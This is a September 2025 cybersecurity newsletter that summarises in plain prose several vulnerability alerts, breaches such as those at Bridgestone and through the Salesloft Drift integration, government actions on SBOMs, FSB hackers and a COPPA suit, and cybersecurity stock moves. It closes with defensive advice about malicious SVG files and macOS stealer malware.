Cyber Briefing: 2025.09.05

SAP flaw exploited, SVG & AMOS malware spread, APT28 Outlook backdoor, Bridgestone cyberattack, NK fake interviews, Salesforce vendor breach, US allies push SBOMs, $10M FSB bounty, DOJ sues toy maker.

Sep 05, 2025

👉 What are the latest cybersecurity alerts, incidents, and news?

Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please Subscribe

Get Help

🚨 Cyber Alerts

1. SAP S4hana Exploited Vulnerability

A new and critical command injection vulnerability in SAP S/4HANA, tracked as CVE-2025-42957, is being actively exploited in the wild. This flaw could allow attackers with low-level user privileges to fully compromise affected systems, leading to data theft, fraud, and a complete subversion of business processes.

2. Virustotal Finds Undetected SVG Files

A new malware campaign is using malicious Scalable Vector Graphics (SVG) files disguised as official documents from the Colombian judicial system to trick users into downloading a ZIP file. In a separate, but related, development, another new campaign is targeting macOS users with a different information-stealing malware called AMOS, which is distributed through pirated software and uses deceptive tactics to bypass Apple's security protections.

3. Russian Apt28 Deploys Outlook Backdoor

A state-sponsored Russian hacking group known as APT28 has been linked to a new Microsoft Outlook backdoor called NotDoor, which allows attackers to steal data and execute commands on a victim's computer. The malware, delivered through a DLL side-loading technique, monitors incoming emails for a specific trigger word, enabling data exfiltration and command execution.

For more alerts, click here!

Check Jobs

💥 Cyber Incidents

4. Bridgestone Confirms Cyberattack

Bridgestone, the world's largest tire manufacturer, has confirmed that it is investigating a cyberattack that has disrupted operations at some of its North American manufacturing facilities. The company believes its rapid response contained the incident, preventing any theft of customer data.

5. North Korean Hackers Fake Interviews

North Korean hackers have been using fake cryptocurrency job interviews to target at least 230 individuals, infecting their systems with malware through a fraudulent skill assessment website. The attacks, part of the "Contagious Interview" campaign, involve the attackers impersonating various finance entities and using a technique called ClickFix to trick victims into executing malicious commands.

6. Cybersecurity Firms Hit By Breach

Proofpoint, SpyCloud, Tanium, and Tenable have confirmed that their Salesforce instances were compromised in the recent Salesforce–Salesloft Drift attack, which exploited a third-party AI chatbot's integration to steal sensitive data. The attackers used compromised OAuth tokens to access information from hundreds of organizations.

For more incidents, click here!

Click to Report

📢 Cyber News

7. US Allies Push For Sboms In Security

Twenty-two government agencies from the US and 14 allied countries have jointly released a guide advocating for the widespread adoption of Software Bills of Materials (SBOMs) to enhance software supply chain security. The guidance highlights how using SBOMs improves security and reduces risks and costs by providing clear visibility into the components of software, which is crucial for identifying and addressing vulnerabilities quickly.

8. Reward For Russian FSB Hackers

The U.S. Department of State is offering a reward of up to $10 million for information on three Russian FSB officers—Pavel Akulov, Mikhail Gavrilov, and Marat Tyukov—who are accused of orchestrating a widespread hacking campaign against U.S. and international critical infrastructure. The officers are alleged to be part of the FSB's Center 16 unit, which has been linked to numerous cyberattacks on energy firms and government agencies worldwide since at least 2012.

9. US Sues Robot Toy Maker Over Data

The U.S. Department of Justice has sued toy maker Apitor Technology for allegedly allowing a Chinese third party to collect children's geolocation data through its app without parental consent, violating the Children's Online Privacy Protection Rule (COPPA). A proposed settlement would require Apitor to pay a $500,000 penalty and comply with COPPA regulations, though the fine will be suspended due to the company's financial state.

For more news, click here!

Check Events

📈Cyber Stocks

As markets kicked off Friday, September 5, 2025, cybersecurity stocks traded cautiously as markets braced for a key U.S. jobs report and potential shifts in Fed policy amid geopolitical jitters.

Radware (RDWR) closed steady, with modest movement reflecting investor confidence supported by recent analyst upgrades from Jefferies and Barclays, even as valuation concerns persisted.
CrowdStrike (CRWD) held near recent levels, as markets balanced cautious reactions to mixed near-term guidance with confidence in its ARR growth and AI-driven platform strength.
Check Point Software Technologies (CHKP) settled around $190, maintaining stability as investors favored its strong fundamentals, steady margins, and position near its 52-week high.
Rapid7 (RPD) ended slightly lower, pressured by Morgan Stanley lowering its price target to $22 and continued technical weakness signaling bearish momentum.
SentinelOne (S) finished higher, supported by positive analyst sentiment, new institutional buying from Atreides Management, and optimism surrounding its AI and endpoint security growth.

💡 Cyber Tip

🖼️ Malicious SVG Files Evade Detection to Deliver Phishing Payloads

Researchers have uncovered a phishing campaign that uses weaponized SVG files disguised as Colombian judicial documents. These files contain hidden JavaScript that decodes a Base64 phishing page and secretly downloads a ZIP file in the background. VirusTotal confirmed that 44 such SVG samples bypassed antivirus detection, making them especially dangerous.

At the same time, a separate campaign is targeting macOS users with Atomic macOS Stealer (AMOS), distributed via pirated software downloads. Attackers trick victims into running Terminal commands to bypass Apple’s Gatekeeper protections. Once installed, AMOS can steal browser data, crypto wallets, credentials, and even files from common folders.

✅ What you should do

Do not open unexpected SVG attachments in emails, even if they appear official
Educate staff about malicious file formats beyond PDFs and Office docs
Use sandboxing and advanced threat detection tools for unusual file types
Only download macOS apps from the App Store or verified developers
Never run commands from pirated or cracked software prompts
Enable Apple’s Lockdown Mode or other hardened settings if you are a high-risk user

🔒 Why this matters
Attackers are weaponizing overlooked file types like SVG and abusing social engineering to bypass security features. These campaigns highlight how malware can blend into everyday workflows, from legal-looking attachments to fake free apps. Vigilance and advanced detection are essential to stop threats that evade traditional antivirus.

Visit Book Club

📚 Cyber Review

Join us for a new edition of Cyber Review featuring Melissa Lukings, author of Understanding Cybersecurity Law and Digital Privacy. In this discussion, Lukings explores how law and technology meet in the fast-changing world of data protection and cybersecurity.

Many lawyers struggle with the technical side of cybersecurity, while many security professionals are unaware of legal requirements. Lukings helps bridge this gap by making complex ideas clear and accessible for legal teams, security experts, businesses, and the public.

She shares what inspired her to write the book, real-world challenges she has studied, and practical guidance for professionals working to protect sensitive information.

Tune in to learn how legal and technical communities can work together to safeguard data and build trust.

Be sure to like, comment, and subscribe for more episodes of Cyber Review.